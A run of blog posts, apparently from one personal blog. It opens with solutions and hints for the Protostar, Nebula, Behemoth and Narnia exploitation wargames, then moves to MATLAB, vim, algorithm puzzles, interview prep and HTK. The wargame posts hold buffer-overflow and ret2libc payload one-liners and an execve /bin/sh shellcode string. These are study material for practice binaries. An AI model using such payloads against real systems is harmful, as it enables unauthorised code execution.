Exploit Exercises : Protostar Stack Solutions

The exercises deal with basics of Stack Overflow, you can read the following articles to know the basics

Before starting you the terminal given in the VM is obnoxious so I created a SSH forwarding from my local terminal

VBoxManage modifyvm <myserver> --natpf1 "ssh,tcp,,3022,,22"

ssh -p 3022 <user>@172.0.0.1 

Stack0

This is the introductory exercise to introduce buffer overflow. Since the buffer size for input is 64 bytes, if you enter a string whose length is more than 64 bytes you are able toe overflow the buffer and rewrite the modified variable.

Stack1

In this case in addition to overflowing the value you have to input a specific value, in little endian format the LSB is stored at the starting addresss

./stack1 $(python -c "print 'a'*64 + '\x64\x63\x62\x61'")

Stack2

In the bash shell you can use the export command to set the environment variable,

export GREENIE=$(python -c "print 'a'*64 + '\x0a\x0d\x0a\x0d")

Stack3

Here, 'fp' is a function pointer. We want to change the address of the fp to that of win() .

objdump -d ./stack3

 generates the object file for the executable from where we can find the address of win() .

 python -c "print 'a'*64 + '\x24\x84\x04\x08'" > /tmp/stack3

           ./stack3 < /tmp/stack3

Stack4

From gdb you can find the address of ebp register using
         info frame
and find the address of the buffer using

         p &buffer

The return address is stored after the %ebp , find the address of win() by using

p win

Now you can create the appropriate payload

Stack5

This exercise requires us to inject shellcode using a payload. You can check that the binary is suid.
https://www.exploit-db.com/exploits/13357/

Stack6

This tutorial covers this exercise very nicely you can read it.

https://exploit.ph/x86-32-linux/2014/08/06/ret2libc-and-rop/

I am going to try a different approach. Here, we are to use the Ret2libc attack with system call

A good tutorial is here https://www.exploit-db.com/docs/17131.pdf ,https://www.exploit-db.com/docs/28553.pdf

Now, I find the address of the system() libc call using

   

    Print system = 0xb7ecffb0

This will not get caught in the if check and will allow the function to return. Now, I need to find the amount of string to overlfow the hte return address of the binary.

80 bytes will get the overflow to work. Now, I need to find the address of the string /bin/bash

0xbffff9ab:     "/bin/bash" in the environment variables, I get by searching all the strings in the stack. Somewhere the env variables must be kept. 

No I construct my payload to be 

python -c "print 'a'*80 + '\xb0\xff\xec\xb7' +'a'*4+ '\xab\xf9\xff\xbf'" > /tmp/680 

To avoid the segmentation fault error replace the four 'a' with address of exit system call. 

python -c "print 'a'*80 + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7'+ '\xab\xf9\xff\xbf'" > /tmp/680

Here, the address of env variable is not the same when using with binary, so after hit an trial I got the correct address. But still the program exits without spawning the shell


Stack7


 

 

Exploit-Exercises : Nebula

Here I give hints to solving various levels of the Exploit Excercises Nebula,. 

Level00

non-required

Level01
symbolic links, override echo

Level02
env variables

Level03
Cron does not output to stdout.


Level04
Symbolic links


Level05
.backup, tar -xvzf <filename>. ssh key-pair


Level06
/etc/passwd


Level07
webserver, url escaping, input sanitization

Level08
tcpdump,


Level09
system()


Level10
https://en.wikipedia.org/wiki/Time_of_check_to_time_of_use#Examples
nc -kl 18211

Level11


PS.  You can find many sources for full solutions. This is just to help yourselves when stuck and yet think about it yourselves.

Overthewire: Behemoth

Behemoth is the next suggested level after narnia, while it still binary exploitation it does not provide the source code of the challenges. Thus requiring users to read the assembly code.

Behemoth0:
ltrace, strings

Behemoth1:
Shellcode Injections , buffer overflow

export LOGNAME=$(python -c "print '\"' + '\x90'*58 +'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\"'") (python -c "print '\x61'*79+ '\xfe\xde\xff\xff'";cat )| ./behemoth1

Behemoth2:
Absolute adressing


Just a comment :
Reading the main code this time we can see that that canary protection has been activated. You can see this using the following code

   0x08048579 <+12>:    mov    %gs:0x14,%eax
   0x0804857f <+18>:    mov    %eax,0x9c(%esp)
   0x08048586 <+25>:    xor    %eax,%eax

   0x08048620 <+179>:    mov    0x9c(%esp),%edx
   0x08048627 <+186>:    xor    %gs:0x14,%edx
   0x0804862e <+193>:    je     0x8048635 <main+200>
   0x08048630 <+195>:    call   0x80483f0 <__stack_chk_fail@plt>

OvertheWire: Narnia

I realised while solving the challenges is that sometimes you just want a little bit hint and not a complete walkthrough , So I am listing hints for narnia challenges

These challenges are based on C fundamentals and binary exploitation techniques which usually direct implementation in many cases. 



Level0 :
DIY

Narnia1:
Shellcode in environment variable

Narnia2:
Buffer Overflow + Shellcode

Narnia3:
Buffer Overflow , symlinks

Narnia4:
No hints for this

Narnia5:
https://www.owasp.org/index.php/Format_string_attack
http://forum.ouah.org/FormatString.PDF

Narnia6:
Function Pointer can be overwritten
https://www.exploit-db.com/docs/28553.pdf

Narnia7:
Format String Vulnerability
ltrace

Narnia8:
 


If you want more detailed explanation or have any doubts or are stuck somewhere , welcome to comment below.

PCA in matlab

Here is a great introduction to PCA for beginners and I can't do better than this Princeton PCA

After reading this I was a bit confused on how to apply this in my matlab code. Let's go through it

    
    [eigenvectors,score,latent] = pca(md);
    md = md * eigenvectors(:,1:10);
    fprintf('Eigenvalues for the data \n');
    disp(latent);

Here md contains my data, suppose that is a matrix of size 10000 x 15 . Now generally I should do some analysis on the variances of eigenvectors before selecting the final dimension that I want. But let's just say that I want 10 .

eigenvectors is a 15 x 15 matrix whose columns are my eigenvectors. Now I project my original data onto the space given by this and get the reduced matrix in md.

Elementary OS with ASUS zenbook

So I recently bought a Asus Zenbook UX305LA FC004T. It's in the same price range of a macbook air but with higher specs. Lookwise it looks like a macbook air copy and comes with a Windows 10 pre-installed.

But for people like who need a linux distro, elementary OS is the upcoming OS who is taking the world by a storm. You will defintely like its UI and its a good combination with Asus Zenbook.

My reviews with the combinations
1. Battery life is about 8hrs with full charge and moderate use, should be more for windows
2. Speakers are very low volume there are few hacks suggested for this.
3. Screen is good and its pretty lighweight and sturdy, my friend sat on it accidentally , still all is good.

Compared with macbook air which comes in the same price range I don't know how this device would fare, but given the extra 128 gb and extra 4gigs ram this seems the better choice.


Few things that I did to install Elementary OS

After dual booting my PC with Freya, I did the following

sudo apt-get install ubuntu-restricted-extras

Run a sudo apt-get update before and enable the canonical partners repository.

Following tools are a must

• Synapse, a semantic serach engine it makes life beautiful when using linux 
• Elementary Tweaks
• Glipper, saves the content of your copyboard
• KeePassX, saves the mundane password and the touble of filling them

Becoming better with vim

These are the things that I learn while on my vim journey

Here is good list of articles that you should read, to start with this is an excellent cheat sheet for vim

A Introductory cheatsheet, do this before going to another

http://www.viemu.com/a_vi_vim_graphical_cheat_sheet_tutorial.html

Then these articles are helpful

Moolenar : Good Vim Habits

ctags, is a very good tool for navigating through big projects.

Here is another very good blog about learning vim
http://yannesposito.com/Scratch/en/blog/Learn-Vim-Progressively/

definitely do the above before moving on.

Next steps after learning these shortcuts is having a good .vimrc file, which is basically a configuration file for your vim( stored in the HOME directory). You can search for popular .vimrc on the net. I'll list a few that I find good

Plugins , now as suggested by a friend I started using vundle , which is a vim plugin manager.

• NERDTree is a must to have when working on code base. 
• Cscope is also a needed when working with large code base, refer to the link for setting up Cscope with vim. Also, do the following for automatic cscope.out detection http://vim.wikia.com/wiki/Autoloading_Cscope_Database 
• Along with NERDTree , you need to learn how to use split screens in vim which is very usefull when working with multiple files. https://www.cs.oberlin.edu/~kuperman/help/vim/windows.html

 

Minimum No. of Jumps

Given an array of non-negative integers, you are initially positioned at the first index of the array.
Each element in the array represents your maximum jump length at that position.
Your goal is to reach the last index in the minimum number of jumps.
Example :
Given array A = [2,3,1,1,4]
The minimum number of jumps to reach the last index is 2. (Jump 1 step from index 0 to 1, then 3 steps to the last index.)
If it is not possible to reach the end index, return -1.

 Follow this link to read a O(n^2) solution GeeksforGeeks: Minimum number of jumps

Read my O(n) solution below

Maximum Product Subarray

One of the standard dp problems, the approach given below is similar to kadane algorithm for maximum subarray sum problem. The code given below fails when negative output is the max possible. For example the input

Input : -4

Comments are welcome.

Preparing for the Coding Interview

Here are a few things that I did while preparing for my placements and a few things that I think I should have done.

This post is written with the plan that you have max of 6 months left before the D-Day, for people in the their 2nd or 3rd years there is a variety of things that would further enhance their chances of being placed.

<-------------------------- 6 Months -------------------------------->
www.geeksforgeeks.org    This is a very big repository of coding interview questions and preparations material. Usually one would require about 6 months to go through the whole material.

<--------------------------- 4 - 5 Months --------------------->

After having read the standard algorithms and Data Structures, its time to gain some coding experience

www.interviewbit.com This site is very good for coders with not much experience, you will have revision of concepts and get practice at the same time. It provides a gaming level sort of UI to make it interesting, which a growing community.

www.leetcode.com This is another site is popular among coders for interview preparation, but many questions between interviewbit and this overlaps so do one of them. InterviewBit has more structure and organization for preparation.

<------------------------------1-2 Months ---------------------------->

Hopefully above level of preparation would be sufficient for clearing hte coding rounds and you are now shortlisted your dream companies. So brush up the topics on your resume and prepare for the specific domains like Networks, OS .

Some important topics to prepare for :
1. Linked List
2. Stacks and Queues
3. Dynamic Programming ( geeksforgeeks has an extensive collection)
4. Greedy
5. Backtracking 
6. Graph Theory ( dfs and bfs will do for most except google,fb ) 


Comments and suggestions are welcome . 

Getting started with Python API for Facebook

Install the repository with

sudo pip install facebook-sdk

Here is a sample program to print the name of your friends 

To get the oauth_access_token follow this link Graph API Explorer

See the following the snippet for printing posts with some specific substring in them. This way we can complete the hack of posting multiple comments on similar posts

I found another python libray, which seems more easier to use than this one. visit that Facepy

SPOJ PRATA

The problem : www.spoj.com/problems/PRATA/

Solution: There are many solutions one can use binary search which is straight forward if you understand the concept of binary search . Use the link to find a binary search based implementation

http://spoj-solutions.blogspot.in/2014/10/prata-roti-prata.html

I used a min-heap based solution. The algorithm is to find the the cook who will next become free and assign him a prata, as simple as that.

My solution is O(p*L) which got accepted. You can find the code through following link
https://github.com/kanirudh/spoj/blob/master/prata.cpp

Comment below in case of queries.

A list of algorithms for Competitive Programming

Solving problems on SPOJ, I realised I used to forget the algorithms which I had previously used. For this fallacy of mine I am listing the algorithms and the corresponding SPOJ problems. There may be better resources on net similar to this but this is my effort. You can also find solutions to these problems on my github page http://www.github.com/kanirudh/SPOJ/

1. Sorting:
     Using the library function for sorting usually does the trick. You need to know how to define a comparator function for sorting user-defined structure arrays.
   
     http://www.spoj.com/problems/DOTAA/

2. String Algorithms
 
     Patten Matching
     a) KMP Algorithm
     http://www.spoj.com/problems/NHAY/
     b) Rabin Karp 

3. Dynamic Programming Algorithms
   
     a) 0/1 Knapsack
     http://www.spoj.com/problems/LKS/
   
     b) Longest Increasing Subsequence
     http://www.spoj.com/problems/XMEN/

     c) Longest Common Subsequence
     http://www.spoj.com/problems/LCS/
     http://www.spoj.com/problems/TRIP/

4. Divide And Conquer
     a) Closest Pair of Points
     http://www.spoj.com/problems/CLOPPAIR/

     b) Binary Search
     http://www.spoj.com/problems/PIE/
     http://www.spoj.com/problems/EKO/
     http://www.spoj.com/problems/OPCPIZZA/
 

5. Graph Algorithms
    ( DFS, BFS, Djisktra, Floyd-Warshall, Bellman-Ford, kruskal)
    http://www.spoj.com/problems/PARADOX/

6. Maths
    Gaussian Elimination
    http://www.spoj.com/problems/XMAX/






 

HTKBook Tutorial and Solutions

While re-creating the chapter 3 of the HTK I encountered the following problems and the solutions to the those problems when I found them

1. The 'gram' file copy the text shown the book into a file 'gram.txt' and run the following command
HParse gram.txt wdnet

2. HSlab does not work showing the following error " MakeXGraf: Not compiled with X11 support" 

Step1. Open htk/HTKLib/htik_htklib_nt.mkf

          Change HGraf.null.obj -> HGraf_WIN32.obj
          Change HGraf.null.olv -> HGraf_WIN32.olv
          Run "nmake /f htk_htklib_nt.mkf all" under HTKLib directary
Step2. Open htk/HTKTools/Makefile.in
           Delete -lXll (lower case of "L")
           Run "nmake /f htk_htktools_nt.mkf all" under HTKTools directory

Found a awesome site which lists all the common error noticed when using HTK. Here is the link for your benefit: HTK Problems and Solutions

Note: The tutorial given in the HTKBook it misses one thing which training dataset. It suggests using TIMIT Database for training. But TIMIT is not free.

I decided to skip a step and search for pre-trained models available online. First I found this one
http://www.keithv.com/software/htk/us/
But then again this did not work as given, many errors occured in the pronounciation dictonary.

Next I found this one http://www.repository.voxforge1.org/downloads/Nightly_Builds/ which has a nicely trained hmm models along with the respective dictionary which is very helpful. Now note you cannot run the live recogniser with these models because they use the following feature extraction scheme which is "MFCC_0_D_N_Z" , but you can sucessfully use the HVite decoding example given in the tutorial. The accuracy for decoding module is very low using these models since they use features described above but which is only possile using HCompV used for training.

I couldn't find a way to emulate the features using HCopy

The next database I tries was the part of TIMIT database available freely( thanks to MIT) , the link is following MIT TIMIT Corpora . The problem with this I am facing is that the pronounciation dictionary is and label files are not matching and some phoneme are not there.

Hacking my way through HTK, I was told that TIMIT label format needs to be modified quite a bit for use with HTK.

Incase of any queries you can contact me.

HTK

HMM Tool Kit has been around for very long and has many predefined tutorials. But stil I found them a little bit confusing the first time around. This post is for those like me

1. Register on the site , you will get a password
2. Download the HTK source and samples for your respective system( I am using windows 7)
3. Follow this link to build your the source http://htk.eng.cam.ac.uk/docs/inst-win.shtml
4. OR alternatively you can directly download the binaries from the following link
http://htk.eng.cam.ac.uk/ftp/software

Finally run the runDemo.pl to check if your installation is finally complete.

Now we will see how to use these libraries in your C++ Projects, which is what we have to do in the long run. The HTKBook which is the guide for using HTK declares in the starting itself that it does not tell how to integrate in some programming evnironment. There is an alternative called ATK.

Note HTK is primarily used for building HMM models and there exists more user friendly tools for testing purposes and HTK HMM Models can generally be converted into other applications HMM Models. Furthermore HTK has been written with speech recognition in mind and I quote my mentor "using HTK for any other application become an uphill battle". I am facing the same in my current project.

Microprocessor 8085

Microprocessors 8085 is one of the earliest microprocessor with wide use in practical applications, though only for learning purposes now. I wish to talk about it's interrupts. It has a total of five interrupts,
i) INTR
ii) RST 5.5
iii) RST 6.5
iv) RST 7.5
v) TRAP

Now there are two fundamentals to be remembered, the interrupts can be disabled and they can be masked there is a difference between the two. When you disable interrupts using the "DI" command ,well they are disabled.
But when you mask any interrupt what basically happens is that the interrupt input is passed through a NAND gate before going to individual flip-flops for each interrupt input. When you mask any interrupt a '0' is passed to NAND thus effectively rendering the output of NAND to '1' when most of the interrupt are edge-triggered or low-level initiated. The masking is done using SIM command. which takes the accumulator value and to set various masks. Every bit in the 8-bit input given to SIM corresponds to masking of a specific interrupt.

One other example I would like to discuss with 8085 is generation of some complex waveform like the sine wave. Unfortunately, calculating each point in the 8085 is cumbersome and roundabout way to precalculate the points and store them in the memory then write a simple program which iterated through the values and displays them.

Hope this helped you learn something more.

ShellSort

Global Silhouette Matlab

Whenever we cluster we should check the cluster quality but how can we do this ? One of the way to do that is to calculate it's Global Silhouette. It works pretty well for most clustering algorithms.

The basic idea behind global silhouette is what is the quality of separation between the points in one cluster to another cluster's points.

Below is the matlab code for it which uses silhouette() function from matlab .

If you need the code for silhouette or how to calculate s(i) for each data point e-mail me.

Matlab Examples

Here is a code for averaging a set of signals, note that my input is taken from a .wav file and thus is of different making it a little more code. This is for who got stuck and can't find a way out.Using the saved .jpeg files you can see how it works visually.

Douglas-Peucker Algorithm

An algorithm for smoothing a 2-d plot . You can read a good explanation of it at wikipedia Wiki Link . Following is the matlab code that I wrote for it: